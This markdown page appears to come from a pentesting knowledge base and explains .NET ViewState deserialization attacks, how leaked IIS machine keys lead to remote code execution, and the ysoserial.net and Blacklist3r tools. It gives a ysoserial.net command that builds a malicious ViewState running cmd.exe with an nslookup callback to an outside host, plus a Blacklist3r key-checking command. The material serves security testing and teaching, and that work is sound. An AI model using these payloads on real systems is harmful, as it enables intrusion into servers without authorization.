<!---------------------------------------------------------------------------------
Copyright: (c) BLS OPS LLC.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 3.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
--------------------------------------------------------------------------------->
# .NET Insecure Viewstate Deserialization

## Key Takeaway

>>>
* If you ever get the IIS validation key, and the application uses viewstate at all, you can get code execution
* Much of the time with IIS, **arbitrary file read = RCE**
* It's always worth using Blacklist3r to try and decrypt the viewstate to see if known keys are in use
>>>

## Summary

#### Background

.NET applications have something called the **viewstate**. The idea is to add some "state" to what is fundamentally a stateless protocol. Most applications maintain state primarily on the server, whereas .NET splits the responsibility between the client and server - and the client portion is the viewstate. This helps preserve various values on the page as requests go back and forth.

The viewstate is self is a serialized object. This means, by definition, it must be deserialized by the server. This functionality was created prior to much of the current understanding of the security threat deserialization can pose. To prevent tampering with the viewstate, including the ability to send a malicious deserialization payload, the viewstate is **signed** with  a MAC (message authentication code) to protect integrity, and can also be **encrypted** to protect the contents of the viewstate. 

There was a time when it was possible to disable both the MAC and encryption, and have a completely unprotected viewstate. Once deserialzation attacks became mainstream, this became a security nightmare and microsoft was forced to override these settings. As of Sept 2014, it is no longer possible to disable the viewstate MAC. 

*Actually, it is technically possible, but you have to go out of your way and change obscure registry keys or turn on on obscure options that make it very clear you are doing something incredibly dangerous*

Despite this, the key used to sign the viewstate is (in MANY, but not all IIS configurations) stored within the web.config file - typically located in the root of the web application. **It may also be stored in machine.config within the .NET framework isntallation directory.** 

**This means that if you gain access to this key, say from an arbitrary file read, you will have code execution.** 

*If the viewstate is also encrypted (it usually is), you will also need the encryption key. This is almost never a problem since the validation key and encryption key are stored together.*

Ysoserial.net contains a viewstate plugin that can simplify the process of creating a malicious viewstate if you have the keys.

#### Blacklist3r

Another approach to finding the encryption/validation key is abusing known keys. Some frameworks have been known to ship with pre-installed keys, the project Blacklist3r is an attempt to catalog them and make abusing them easy. Checking a viewstate against blacklist3r is a quick step that might result in a big win.

## Resources
* **Exploiting Deserialization in ASP.NET view ViewState** - [https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* **Notsosecure - overview of ysoserial.net and blacklist3r viewstate exploitation** - [https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/](https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)

* **Farewell, EnableViewStateMac** - Microsofts annoucement that they were forcing viewstate MAC's to be enabled - [https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/](https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/)

## Tools

* **Ysoserial.net** - [https://github.com/pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
* **Blacklist3r** - [https://github.com/NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)

## Payloads

#### ysoserial.net

The following is an example of using the ysoserial.net binary to generate a payload with known encryption/validation keys:

```
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your-interactsh-server>"  --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>"  --validationalg="SHA1" --validationkey="<validation key>"
```

Once you have generated this blob, you need to find a place in the application that is **reading the viewstate**. Some applications will read the viewstate on every request, others will only do some on specific requests. In almost all cases, this will be a POST request - although there are apps where adding the GET parameter "__VIEWSTATE" will work too. Your best bet is to find a page that is naturally setting the viewstate, as this is a strong indication that is actively using it. 

**Don't forget to URL encode it!** This is a common gotcha. You dont need to URL encode everything. Just highlight it in burp, right click and select "URL encode key characters". 

#### Blacklist3r

An example of using blacklist3r to identify when known machine keys are in use:

```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate  --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy
```
